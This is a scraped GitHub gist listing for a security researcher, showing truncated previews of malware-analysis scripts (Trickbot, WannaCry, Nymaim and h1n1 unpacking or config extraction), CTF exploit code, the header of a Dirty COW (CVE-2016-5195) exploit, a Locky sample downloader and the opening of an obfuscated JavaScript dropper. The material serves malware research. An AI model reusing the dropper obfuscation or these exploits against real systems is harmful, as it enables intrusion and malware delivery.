Skip to content

Instantly share code, notes, and snippets.

Maciej Kotowicz mak

Block or report user

Report or block mak

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@mak
mak / trick.py
Created May 16, 2019
Get config from unpacked trickbot
View trick.py
import re
import sys
import pefile
from mlib.crypto import xor
from mlib.malware import trickbot
from mlib.struct import udword
def find_cfg_params(data):
@mak
mak / x.js
Created Mar 27, 2019
exploit of plang chall from 0ctf2019
View x.js
fun int2double(xint) { var i = 0 while(i< 1074) { xint = xint / 2 i = i + 1} return xint }
fun double2int(xd) { var i = 0 while(i< 1074) { xd = xd + xd i = i + 1} return xd }
fun shift(xint,x) { var i = 0 while(i<x) { xint = xint + xint i = i + 1} return xint }
var c = -30
var x = -114
var y = -115
var a = [101,1,1,1,1,1,1,1,1,1]
var b = [1011,2,"chuj",3,4]
@mak
mak / exp300.py
Created Jan 3, 2018
Exploit for 300 at 34c3ctf
View exp300.py
import phun
class R(phun.Remote):
def menu(self):
self.read('4) free\n')
def cmd(self,nr,idx):
self.menu()
self.sendline(str(nr))
@mak
mak / wcr.py
Last active Oct 28, 2018
Extract everything from WannaCry
View wcr.py
import re
import os,sys
import pefile
import struct
import zipfile
import hashlib
import StringIO
from Crypto import Random
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5,AES
@mak
mak / x.sh
Created Mar 7, 2017
one-liner to extract powershell command in recent nymaim's documnets
View x.sh
( olevba $document | grep ' = ' | \
sed -e's/&/+/g' -e's/NaN/None/g' -e's/ = [^A].*(\(A.*)\))/= \1/' -e 's/Array//' \
-e's/(/[/g' -e's/)/]/g' -e "s#\"\([^\"]*\)\"\([^\"]*\)\"#\"\1'\2#" | \
grep '\[\|\+'; \
echo 'print globals()[sorted(globals(),key=lambda x: type(globals()[x]) == str and len(globals()[x]))[-1]]'
) \
| python2 - | tr -d '^' | tr '[:upper:]' '[:lower:]'
@mak
mak / hdoc.py
Last active Oct 28, 2018
Extract payload from H-docs
View hdoc.py
#!/usr/bin/env python2
import os
import re
import sys
import math
import pefile
import struct
import hashlib
import argparse
from oletools import olevba
@mak
mak / naughtyc0w.c
Created Oct 22, 2016
exploit for CVE-2016-5195 nothing fancy
View naughtyc0w.c
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/uio.h>
#include <sys/wait.h>
@mak
mak / get_locky.py
Created Jun 22, 2016
locky sample downloader
View get_locky.py
import sys
import hashlib
import struct
import requests
def decode(data,seed,step):
r = []
k = seed
for c in map(ord,data):
r.append(chr(c ^ k))
@mak
mak / h1n1_emu.py
Created May 27, 2016
Unpack last stage of h1n1 loader
View h1n1_emu.py
import sys
import pefile
from unicorn import *
from unicorn.x86_const import *
pe = pefile.PE(sys.argv[1])
for s in pe.sections:
if s.Name.strip("\x00") == '.rsrc':
code_section = s
@mak
mak / Document.js
Last active Oct 28, 2018
Obfuscated dropper
View Document.js
obj_even='fuck';obj_term='aiyyoI';obj_term='thingIm';obj_initiatives6='just';obj_terabytes3='little';obj_since='bitAiyyo7'
;obj_analytics='dispensing';obj_some0='thingIm';obj_target2='motherfucking8';obj_gigabytes='smile';obj_store4='freaks
;obj_percapita='feeding';obj_size10='this';obj_hundreds10='just5';obj_complex='itself2';obj_their1='feeding';obj_sets
='dont4';obj_simulations3='relieveAll';obj_seldom='freaks';var obj_from=this[{the2:'\u0041'}.the2+{h0:'\u0063'}.h0+{o0
:'\u0074'}.o0+{if1:'\u0069'}.if1+{a2:'\u0076'}.a2+{efe0:'\u0065'}.efe0+{ou2:'\u0058'}.ou2+{at3:'\u004f'}.at3+{l1:'\u0062'}
.l1+{ccu1:'\u006a'}.ccu1+{a0:'\u0065'}.a0+{ec0:'\u0063'}.ec0+{an1:'\u0074'}.an1];var obj_thousands7=this[{eri0:'\u0057'}
.eri0+{onn0:'\u0053'}.onn0+{ue0:'\u0063'}.ue0+{un2:'\u0072'}.un2+{iff1:'\u0069'}.iff1+{red3:'\u0070'}.red3+{n3:'\u0074'}
.n3];var obj_data6 = obj_thousands7[{e3:'\u0043'}.e3+{art0:'\u0072'}.art0+{ec1:'\u0065'}.ec1+{l3:'\u0061'}.l3+{ea2
:'\u0074'}.ea2+{o1:'\u0065'}.o1+{ci2:'\u004f'}.ci2+{e2:'\u0062'}.e
You can’t perform that action at this time.